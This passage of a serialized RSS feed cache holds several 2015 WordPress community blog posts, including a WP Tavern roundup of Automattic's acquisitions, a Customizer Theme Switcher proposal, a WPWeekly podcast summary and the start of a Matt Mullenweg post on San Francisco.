href=\"http://blog.polldaddy.com/2008/10/15/automattic-acquires-polldaddy/\">acquired by Automattic</a> in 2008. Between 2006 and when the company was acquired, about 1 million polls were created and 195 million votes were collected. At the time of Polldaddy’s acquisition, Automattic had <a title=\"http://www.theguardian.com/technology/pda/2010/nov/26/ireland-sligo-polldaddy-wordpress-startup\" href=\"http://www.theguardian.com/technology/pda/2010/nov/26/ireland-sligo-polldaddy-wordpress-startup\">about 20 employees</a>.</p>\n<h2>Blo.gs</h2>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/blogslogo.png\" rel=\"prettyphoto[38863]\"><img class=\"alignright size-full wp-image-38873\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/blogslogo.png?resize=244%2C90\" alt=\"blogs logo\" /></a><a title=\"http://blo.gs\" href=\"http://blo.gs\">Blog.gs</a> is a directory of recently updated blogs founded in 2002 by Jim Winstead. In 2005, the company was <a title=\"http://trainedmonkey.com/2005/6/14/blo_gs_has_been_acquired_by_yahoo_\" href=\"http://trainedmonkey.com/2005/6/14/blo_gs_has_been_acquired_by_yahoo_\">acquired by Yahoo!</a> and in 2009, transferred to Automattic. According to the <a title=\"http://ma.tt/2009/04/blogs-lives-on/\" href=\"http://ma.tt/2009/04/blogs-lives-on/\">announcement</a>, Automattic planned to beef up the service, “We’re looking forward to beefing up the service and giving it a refresh, while continuing its reputation for reliability.” The site’s design hasn’t changed in years and features like search and ping submissions are broken.</p>\n<h2>After the Deadline</h2>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2009/09/afterthedeadlinelogo.png\" rel=\"prettyphoto[38863]\"><img class=\"alignright wp-image-2512 size-full\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2009/09/afterthedeadlinelogo.png?resize=253%2C60\" alt=\"afterthedeadlinelogo\" /></a><a title=\"http://www.afterthedeadline.com/\" href=\"http://www.afterthedeadline.com/\">After the Deadline</a> is a contextual spell checking service created in 2009 by Raphael Mudge. Out of all the acquisitions Automattic has made, Mudge has <a title=\"http://blog.afterthedeadline.com/2009/09/08/after-the-deadline-acquired/\" href=\"http://blog.afterthedeadline.com/2009/09/08/after-the-deadline-acquired/\">one of the best acquisition stories</a> I’ve read. After <a title=\"http://news.ycombinator.com/item?id=636168\" href=\"http://news.ycombinator.com/item?id=636168\">publishing a comment</a> on a Hacker News article showing off how AtD works, Mullenweg got in touch with Mudge and acquired the company in 2009.</p>\n<p>Mudge stayed with the company for a few years, but moved on to focus his energy on a new passion, <a title=\"http://www.advancedpentest.com/\" href=\"http://www.advancedpentest.com/\">cyber security</a>. AtD is actively developed and is available as <a title=\"http://jetpack.me/support/spelling-and-grammar/\" href=\"http://jetpack.me/support/spelling-and-grammar/\">a module in Jetpack</a>.</p>\n<h2>Plinky</h2>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/Plinkylogo.png\" rel=\"prettyphoto[38863]\"><img class=\"alignright wp-image-38875 size-full\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/Plinkylogo.png?resize=283%2C127\" alt=\"Plinkylogo\" /></a><a title=\"http://www.plinky.com/\" href=\"http://www.plinky.com/\">Plinky</a> is a service created by Thing Labs that inspired users to write content. Every day Plinky displayed a prompt with a question, idea, or challenge. Writers answered the challenge using the Plinky editor which made it easy to add rich media and send posts to social media services. Plinky was acquired by Automattic in 2010. In 2014, user registration was disabled and the service was placed into archive mode.</p>\n<h2>Code Garage</h2>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2012/12/CodeGaragelogo.jpg\" rel=\"prettyphoto[38863]\"><img class=\"alignright wp-image-6754 size-full\" src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2012/12/CodeGaragelogo.jpg?resize=262%2C54\" alt=\"Code Garage Logo\" /></a><a title=\"http://codegarage.com/blog/\" href=\"http://codegarage.com/blog/\">Code Garage</a> provided backups, security scanning, and crisis control for WordPress sites. Customers could monitor 5 websites for $25 a month which was more affordable than VaultPress which charged a flat fee per site. Code Garage was founded in 2010 and <a title=\"http://blog.vaultpress.com/2012/12/21/vaultpress-in-the-garage/\" href=\"http://blog.vaultpress.com/2012/12/21/vaultpress-in-the-garage/\">acquired by Automattic</a> in 2012.</p>\n<p>In May of 2013, Code Garage <a title=\"http://wptavern.com/code-garage-migrations-are-underway\" href=\"http://wptavern.com/code-garage-migrations-are-underway\">migrated customers</a> to VaultPress and promptly shut the service down in July. As part of the acquisition, Peter Butler, one of the company’s founders, joined Automattic to work with the VaultPress team.</p>\n<h2>Simperium and Simplenote</h2>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/Simperiumlogo.png\" rel=\"prettyphoto[38863]\"><img class=\"alignright size-full wp-image-38878\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/Simperiumlogo.png?resize=127%2C126\" alt=\"Simperiumlogo\" /></a> <a title=\"https://simperium.com/\" href=\"https://simperium.com/\">Simperium </a>is the creator of <a title=\"http://simplenote.com/\" href=\"http://simplenote.com/\">SimpleNote</a>, a note taking app that is synchronized across platforms. Simperium is a data synchronization service that allows developers to move data everywhere it’s needed. The company was founded in 2010 and <a title=\"http://ma.tt/2013/01/simplenote-and-simperium/\" href=\"http://ma.tt/2013/01/simplenote-and-simperium/\">acquired by Automattic</a> in 2013.</p>\n<h2>Poster</h2>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/PosterApp.png\" rel=\"prettyphoto[38863]\"><img class=\"alignright size-medium wp-image-38945\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/PosterApp.png?resize=300%2C148\" alt=\"Poster Mobile App\" /></a>Poster was a slick, easy to use, WordPress mobile app for iOS that was founded by <a title=\"http://www.tomwitkin.com/\" href=\"http://www.tomwitkin.com/\">Tom Witkin</a> and <a title=\"http://techcrunch.com/2013/06/17/automattic-acquires-ios-wordpress-client-poster-to-improve-its-own-mobile-apps/\" href=\"http://techcrunch.com/2013/06/17/automattic-acquires-ios-wordpress-client-poster-to-improve-its-own-mobile-apps/\">acquired in 2013</a>. After the acquisition, the app was removed from the App Store and Witkin joined the mobile team at Automattic.</p>\n<p>Frederic Lardinois, who <a title=\"http://techcrunch.com/2013/06/17/automattic-acquires-ios-wordpress-client-poster-to-improve-its-own-mobile-apps/\" href=\"http://techcrunch.com/2013/06/17/automattic-acquires-ios-wordpress-client-poster-to-improve-its-own-mobile-apps/\">wrote about the news</a> on TechCrunch, described the app as, “one of the most elegant and smarter mobile WordPress clients.” The WordPress mobile apps continue to get better, but it’s unclear which improvements have been influenced by Witkin or Poster.</p>\n<h2>Lean Domain Search</h2>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2013/07/LeanDomainSearchLogo.jpg\" rel=\"prettyphoto[38863]\"><img class=\"alignright size-full wp-image-7919\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2013/07/LeanDomainSearchLogo.jpg?resize=259%2C51\" alt=\"Lean Domain Search Logo\" /></a><a title=\"http://www.leandomainsearch.com/\" href=\"http://www.leandomainsearch.com/\">Lean Domain Search </a>is a service that allows users to find and register domain names. One of its signature features is the domain name generator which suggests domains based on a word or phrase. Lean Domain Search was created by Matt Mazur in 2012 and <a title=\"http://www.leandomainsearch.com/blog/45-lean-domain-search-acquired-by-automattic\" href=\"http://www.leandomainsearch.com/blog/45-lean-domain-search-acquired-by-automattic\">acquired in 2013.</a> When users find a domain they like, Lean Domain Search provides an option to register it and create a new blog on WordPress.com. Thanks to the acquisition, the service is still available and free to use.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/LeanDomainSearchResults.png\" rel=\"prettyphoto[38863]\"><img class=\"size-full wp-image-38882\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/LeanDomainSearchResults.png?resize=996%2C761\" alt=\"Lean Domain Search Results\" /></a>Lean Domain Search Results\n<p> </p>\n<h2>Cloudup</h2>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2013/12/cloudup.png\" rel=\"prettyphoto[38863]\"><img class=\"alignright wp-image-12353 size-thumbnail\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2013/12/cloudup.png?resize=150%2C150\" alt=\"cloudup\" /></a><a title=\"https://cloudup.com/\" href=\"https://cloudup.com/\">Cloudup</a> is a free file-sharing service founded by Thianh Lu and Guillermo Rauch in 2010 and <a title=\"http://ma.tt/2013/09/automattic-cloudup/\" href=\"http://ma.tt/2013/09/automattic-cloudup/\">acquired in 2013</a>. <a title=\"http://techcrunch.com/2013/09/25/automattic-acquires-file-sharing-service-cloudup-to-build-faster-media-library-and-enable-co-editing/\" href=\"http://techcrunch.com/2013/09/25/automattic-acquires-file-sharing-service-cloudup-to-build-faster-media-library-and-enable-co-editing/\">According to TechCrunch</a>, the acquisition was supposed to help Automattic improve two particular features on WordPress.com. The media library used for uploading visual content and co-editing to give multiple users the ability to edit a post at the same time.</p>\n<p>Immediately following the deal, the team was tasked with revamping the post editor and replacing the media library on WordPress.com with Cloudup. Although Cloudup has <a title=\"https://cloudup.com/blog\" href=\"https://cloudup.com/blog\">continued to add new features</a>, it has yet to replace the media library or add the ability to edit posts at the same on WordPress.com.</p>\n<h2>Longreads</h2>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2014/04/longreads.jpg\" rel=\"prettyphoto[38863]\"><img class=\"alignright size-medium wp-image-20743\" src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2014/04/longreads.jpg?resize=300%2C95\" alt=\"longreads\" /></a><a title=\"http://longreads.com/\" href=\"http://longreads.com/\">Longreads</a> is dedicated to finding and sharing the best long-form stories on the web. Longreads was founded by Mark Armstrong in 2009 and <a title=\"http://en.blog.wordpress.com/2014/04/09/longreads-joins-automattic/\" href=\"http://en.blog.wordpress.com/2014/04/09/longreads-joins-automattic/\">acquired in 2014. </a>Longreads operates under a paid subscription model with plans ranging from $3-5 per month.</p>\n<h2>Scroll Kit</h2>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2014/04/scroll-kit.png\" rel=\"prettyphoto[38863]\"><img class=\"alignright size-medium wp-image-21768\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2014/04/scroll-kit.png?resize=300%2C158\" alt=\"scroll-kit\" /></a> <a title=\"http://www.scrollkit.com/\" href=\"http://www.scrollkit.com/\">Scroll Kit</a> allowed users to create web pages without writing a line of code using a powerful visual editor. It made headlines when co-founder, Cody Brown, <a title=\"http://techcrunch.com/2013/05/21/snow-fail-the-new-york-times-and-its-misunderstanding-of-copyright/\" href=\"http://techcrunch.com/2013/05/21/snow-fail-the-new-york-times-and-its-misunderstanding-of-copyright/\">recreated the famous Snow Fall piece</a> from the New York Times. Brown said he made the replica site in only an hour, “The New York Times spent hundreds of hours hand-coding ‘Snow Fall.’ We made a replica in an hour.”</p>\n<p>Founded by Kate Ray and Cody Brown, <a title=\"http://www.scrollkit.com/\" href=\"http://www.scrollkit.com/\">Scroll Kit</a> was <a title=\"http://ma.tt/2014/04/scrollkit-and-longreads-at-automattic/\" href=\"http://ma.tt/2014/04/scrollkit-and-longreads-at-automattic/\">acquired in 2014</a>. According to an announcement on the <a title=\"http://www.scrollkit.com/\" href=\"http://www.scrollkit.com/\">Scroll Kit website</a>, Ray and Brown joined the WordPress.com product team. Scroll Kit shut down its service and users had three months to export their content. I’ve never used Scroll Kit, so it’s hard to determine what improvements are influenced by Ray and Brown. <a title=\"http://wptavern.com/automattic-snaps-up-scroll-kit-to-add-to-the-wordpress-com-product-team\" href=\"http://wptavern.com/automattic-snaps-up-scroll-kit-to-add-to-the-wordpress-com-product-team\">We questioned</a> whether Scroll Kit’s editor would be added to the theme editing experience on WordPress.com. As a WordPress.com user, I haven’t noticed any major changes to the theme editing experience since the acquisition.</p>\n<h2>Parka</h2>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2013/07/bruteforcelogo.jpg\" rel=\"prettyphoto[38863]\"><img class=\"alignright size-full wp-image-7693\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2013/07/bruteforcelogo.jpg?resize=228%2C219\" alt=\"Brute Protect Logo\" /></a><a title=\"http://getparka.com/\" href=\"http://getparka.com/\">Parka</a> is the parent company of <a title=\"https://bruteprotect.com/\" href=\"https://bruteprotect.com/\">BruteProtect,</a> a service that provides brute force login protection for thousands of sites. Parka was established in 2013 by Sam Hotchkiss and <a title=\"http://jetpack.me/2014/08/26/automattic-bruteprotect/\" href=\"http://jetpack.me/2014/08/26/automattic-bruteprotect/\">acquired in 2014. </a>All seven Parka employees joined Automattic and are part of the Jetpack development team.</p>\n<p>As part of the acquisition, <a title=\"https://my.bruteprotect.com/\" href=\"https://my.bruteprotect.com/\">BruteProtect pro</a> services became free to use. BruteProtect is undergoing a transformation as it’s merged into Jetpack as a module. Merging with Jetpack will give millions of sites free brute force login protection making the web a safer place.</p>\n<h2>Code For The People</h2>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/CodeForThePeopleLogo.png\" rel=\"prettyphoto[38863]\"><img class=\"alignright wp-image-38941 size-full\" src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/CodeForThePeopleLogo.png?resize=270%2C132\" alt=\"CodeForThePeopleLogo\" /></a><a title=\"http://codeforthepeople.com/\" href=\"http://codeforthepeople.com/\">Code For The People</a> is a WordPress development agency based in the United Kingdom and a long time partner of the <a title=\"http://vip.wordpress.com/\" href=\"http://vip.wordpress.com/\">WordPress.com VIP program</a>. Founded by Simon Dickson and Simon Wheatley, Code For The People was <a title=\"http://wptavern.com/automattic-acquires-code-for-the-people-expands-wordpress-com-vips-reach-into-european-markets\" href=\"http://wptavern.com/automattic-acquires-code-for-the-people-expands-wordpress-com-vips-reach-into-european-markets\">acquired in 2014. </a>All six employees joined Automattic and will help out the VIP team during European hours.</p>\n<p>This acquisition is historic for two reasons. The first is that CTFP is the first WordPress development agency to be acquired by Automattic. Second, CFTP employee John Blackbourn was leading<a title=\"http://wptavern.com/meet-john-blackbourn-wordpress-4-1-release-lead\" href=\"http://wptavern.com/meet-john-blackbourn-wordpress-4-1-release-lead\"> the development cycle for WordPress 4.1</a> when the acquisition occurred, turning him into an Automattic employee.</p>\n<p>In addition to talent, they also obtained CFTP’s <a href=\"http://babbleplugin.com/\" target=\"_blank\">Babble</a> plugin, an open source multilingual tool, that will continue to be maintained by Automattic. According to <a title=\"http://techcrunch.com/2014/11/06/automattic-buys-uks-code-for-the-people-to-build-out-its-wordpress-vip-enterprise-business/\" href=\"http://techcrunch.com/2014/11/06/automattic-buys-uks-code-for-the-people-to-build-out-its-wordpress-vip-enterprise-business/\">TechCrunch</a>, Mullenweg says Babble was a key part of the deal.</p>\n<h2>Thoughts and Observations</h2>\n<p>While going through the list of acquisitions Automattic has made over the years, a few things occurred to me. For all the great talent Automattic has acquired, it’s difficult to determine an individual’s influence on WordPress.com products. For instance, as an individual, Tom Witkin created an awesome mobile app for WordPress. Since being acquired, I can’t tell which improvements in the <a title=\"https://apps.wordpress.org/\" href=\"https://apps.wordpress.org/\">WordPress for iOS app</a> are the result of his work.</p>\n<p>Whether it’s due to time, difficulty, or other factors, certain items in some of the acquisition announcements have failed to materialize. A good example is the Cloudup acquisition. Nearly two years after the deal happened, WordPress.com and the self-hosted version still lack the ability to co-edit a post at the same time. There’s also no improvements to the media library I can trace back to the Cloudup team. It’s unclear if these are items still on the priority list or if they’ve been discarded.</p>\n<p>Another thing I noticed is that I didn’t recognize most of the businesses, products, and services acquired until after the acquisition announcement was published. It indicates Mullenweg has his eye on up and coming properties doing awesome things in the space. Unfortunately, in some instances, it means the product or service is shut down by Automattic eliminating any opportunity to use it. Poster, Blo.gs, and Scroll Kit immediately come to mind as things I’ll never have the chance to use.</p>\n<p>I hope you enjoyed this trip down memory lane. We’re at the beginning of a new year and with <a title=\"http://recode.net/2014/05/05/wordpress-parent-automattic-has-raised-160-million-now-valued-at-1-16-billion-post-money/\" href=\"http://recode.net/2014/05/05/wordpress-parent-automattic-has-raised-160-million-now-valued-at-1-16-billion-post-money/\">Automattic raising $160M in 2014</a>, it’s only a matter of time before we read about the next acquisition. Who or what do you think the company will acquire next?</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 13 Feb 2015 03:55:39 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:10;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"WPTavern: Customizer Theme Switcher Officially Proposed for WordPress 4.2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38876\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"http://wptavern.com/customizer-theme-switcher-officially-proposed-for-wordpress-4-2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2720:\"<p>This week, Nick Halsey officially <a href=\"https://make.wordpress.org/core/2015/02/11/customizer-theme-switcher-feature-plugin-merge-proposal/\" target=\"_blank\">proposed</a> the Customizer Theme Switcher feature plugin for merge into WordPress 4.2. Halsey summarizes the goal of bringing theme switching into the customizer: “By integrating themes directly into the Customizer, live-previewing workflows are greatly simplified, and the relationship between themes and theme/site options is clarified for the user,” he said.</p>\n<p>Halsey explained that the new UI is part of a long-term plan to move all the “Appearance” functionality into the customizer. “The future roadmap includes <a href=\"https://wordpress.org/plugins/menu-customizer\">Menus</a>, Theme-Install, and iterations on widgets that would allow the customizer to entirely replace those admin screens for most users,” he said.</p>\n<p>His proposal includes a video that demonstrates how a user might scroll through the customizer to browse and preview available themes.</p>\n<p><span class=\"embed-youtube\"></span></p>\n<p>It’s important to note that if this feature plugin is cleared for merge, users will not have to search for and install themes from the narrow customizer pane. The Customizer Theme Switcher is intended for previewing and activating themes that have already been installed. Contributors on the project are proposing that WordPress 4.2 redirect the “Themes” link that appears in the frontend admin bar to the customizer, instead of the backend.</p>\n<p>In the future, Halsey plans to integrate theme installation into the customizer, but this is a larger effort that will be added to the project in a later release. Coming up with a UI that doesn’t make this a cramped and inconvenient experience is going to be a challenge.</p>\n<p>For more technical details on the proposed core changes and merge implementation, check out Halsey’s post on the <a href=\"https://make.wordpress.org/core/2015/02/11/customizer-theme-switcher-feature-plugin-merge-proposal/\" target=\"_blank\">Make/Core blog</a>. If you want to test out the new UI for theme switching, you can download the <a href=\"https://wordpress.org/plugins/customizer-theme-switcher/\" target=\"_blank\">Customizer Theme Switcher</a> plugin from WordPress.org.</p>\n<p>The feature plugin merge window will be closing the week of February 25th, and the official release is <a href=\"https://make.wordpress.org/core/version-4-2-project-schedule/\" target=\"_blank\">targeted for the week of April 22nd</a>. Updates on whether or not the Customizer Theme Switcher is approved for merge will be available within the next few weeks.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 12 Feb 2015 21:04:05 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:11;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:85:\"WPTavern: WPWeekly Episode 179 – Interview With James Laws, Co-founder of WP Ninjas\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:44:\"http://wptavern.com?p=38913&preview_id=38913\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:90:\"http://wptavern.com/wpweekly-episode-179-interview-with-james-laws-co-founder-of-wp-ninjas\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3285:\"<p>In this episode of WordPress Weekly, <a title=\"http://marcuscouch.com/\" href=\"http://marcuscouch.com/\">Marcus Couch</a> and I are joined by the co-founder of <a title=\"http://wpninjas.com/\" href=\"http://wpninjas.com/\">WP Ninjas</a>, <a title=\"http://jameslaws.com/\" href=\"http://jameslaws.com/\">James Laws</a>. WP Ninjas specializes in WordPress plugins such as <a title=\"http://ninjaforms.com/\" href=\"http://ninjaforms.com/\">Ninjas Forms</a> and <a title=\"http://ninjademo.com/\" href=\"http://ninjademo.com/\">Ninja Demo</a>.</p>\n<p>In the show, Laws explains the origins of the business and why he decided to enter the forms market despite GravityForms being a popular choice among WordPress developers. He shares some of the mistakes he made early on such as competing based on price and offering a one time purchase price. Near the end of the interview, we find out what the future holds for both products.</p>\n<h2>Stories Discussed:</h2>\n<p><a title=\"http://wptavern.com/initiative-aims-to-improve-the-new-user-experience-in-wordpress-4-2\" href=\"http://wptavern.com/initiative-aims-to-improve-the-new-user-experience-in-wordpress-4-2\">Initiative Aims to Improve the New User Experience in WordPress 4.2</a><br />\n<a title=\"http://wptavern.com/the-first-conference-dedicated-to-wordpress-com-debuts-on-march-28th-in-portland-or\" href=\"http://wptavern.com/the-first-conference-dedicated-to-wordpress-com-debuts-on-march-28th-in-portland-or\">The First Conference Dedicated to WordPress.com Debuts on March 28th in Portland, OR</a><br />\n<a title=\"http://wptavern.com/wp-rocket-grows-from-0-to-35k-in-monthly-revenue\" href=\"http://wptavern.com/wp-rocket-grows-from-0-to-35k-in-monthly-revenue\">WP Rocket Grows From $0 to $35K in Monthly Revenue</a></p>\n<h2>Plugins Picked By Marcus:</h2>\n<p><a title=\"https://wordpress.org/plugins/adminrocket/\" href=\"https://wordpress.org/plugins/adminrocket/\">AdminRocket</a> allows you to customize the WordPress backend with custom themes, dashboard widgets, and your own settings.</p>\n<p><a title=\"https://wordpress.org/plugins/seo-enforcer/\" href=\"https://wordpress.org/plugins/seo-enforcer/\">SEO Enforcer</a> is a small plugin that works with WordPress SEO by Yoast (it’s required), that will truncate your title or meta description tags if they’re too long.</p>\n<p><a title=\"https://wordpress.org/plugins/disable-wp-registration-page/\" href=\"https://wordpress.org/plugins/disable-wp-registration-page/\">Disable WP Registration Page</a> disables the default WordPress registration page by redirecting users who access the registration page URL to the default WordPress login page.</p>\n<p><strong>Next Episode:</strong> Wednesday, February 18th 9:30 P.M. Eastern</p>\n<p><strong>Subscribe To WPWeekly Via Itunes: </strong><a href=\"https://itunes.apple.com/us/podcast/wordpress-weekly/id694849738\" target=\"_blank\">Click here to subscribe</a></p>\n<p><strong>Subscribe To WPWeekly Via RSS: </strong><a href=\"http://www.wptavern.com/feed/podcast\" target=\"_blank\">Click here to subscribe</a></p>\n<p><strong>Subscribe To WPWeekly Via Stitcher Radio: </strong><a href=\"http://www.stitcher.com/podcast/wordpress-weekly-podcast?refid=stpr\" target=\"_blank\">Click here to subscribe</a></p>\n<p><strong>Listen To Episode #179:</strong><br />\n</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 12 Feb 2015 20:13:36 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:12;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"Matt: What I Miss and Don’t Miss About San Francisco\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44012\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:38:\"http://ma.tt/2015/02/left-my-heart-in/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5012:\"<p>A few months ago I was chatting with <a href=\"http://www.borthwick.com/weblog/\">John Borthwick</a>, who had just returned from a trip to San Francisco. I asked him how the city was doing as if he were a traveler who had visited someplace exotic — “How is it <em>over there</em>?” (As an investor he probably sees the crazier side of the city, since part of his job is looking at hundreds of companies, the vast majority of which will fail, and trying to pick a few winners.)</p>\n<p>Despite getting near-daily meeting requests, I don’t currently have any plans to visit San Francisco. I was there in June for a few days for Foo Camp and for drinks with <a href=\"http://www.tommarioni.com/\">the artist Tom Marioni</a>. I returned for <a href=\"http://2014.sf.wordcamp.org/\">WordCamp San Francisco in October</a>, and again a few weeks ago for <a href=\"http://scobleizer.com/\">Scoble’s</a> 50th birthday party and a board meeting. But the couple-times-a-year rhythm seems to be enough for me. I’m enjoying the distance a bit, in fact.</p>\n<p>There has been plenty written about the bubble culture in SF right now, including on <a href=\"http://www.sfgate.com/bayarea/article/Is-the-antitech-movement-obsolete-6067623.php\">the antitech movement that never really took off</a>. <a href=\"http://ma.tt/2013/03/evolution-of-san-francisco/\">It’s a topic I already blogged about in 2013</a>. But I was curious to unpack my own thoughts about being away from it all.</p>\n<p>What I don’t miss:</p>\n<ul>\n<li>Too many meetings — every possible company is there, and everyone wants to meet.</li>\n<li>High prices for everything, from groceries to cocktails. Not even going to talk <a href=\"http://ma.tt/2014/12/how-paul-graham-is-wrong/\">about the real estate market and rentals</a>.</li>\n<li>It takes forever to get across the city, even though it’s only 7 miles.</li>\n<li>The public transit, while workable, pales in comparison to other places like NYC.</li>\n<li>The weather isn’t bad, until you drive to Palo Alto or Marin and notice how much nicer it is there. (Or take a one-hour flight to Los Angeles or San Diego.)</li>\n<li>This is anecdotal, but I feel like cell phone service is terrible, especially for making calls. Calls are unintelligible and drop frequently. I think this is why everyone texts.</li>\n</ul>\n<p>I don’t have any problem with the social scene; SF might be tech-heavy, but it’s fairly easy to get out of the tech bubble. Many forget that San Francisco is home to a ton of people working for non-profits, in fashion, finance, bio-tech, art, and music.</p>\n<p>What I miss, deeply: <strong>the people.</strong> Some of my favorite people, professionally and personally, are in the Bay Area, and that’s the thing that will draw me back someday. I’m lucky that I can catch up with folks when they travel, like <a href=\"http://janekim.org/\">Jane</a> or <a href=\"http://tonyconrad.wordpress.com/\">Tony</a> in New York or <a href=\"http://om.co/\">Om</a> in Italy. Of course the Automattic headquarters is there, along with some great colleagues, but I can also catch up with them at meetups.</p>\n<p>I miss how much <strong>technology permeates the 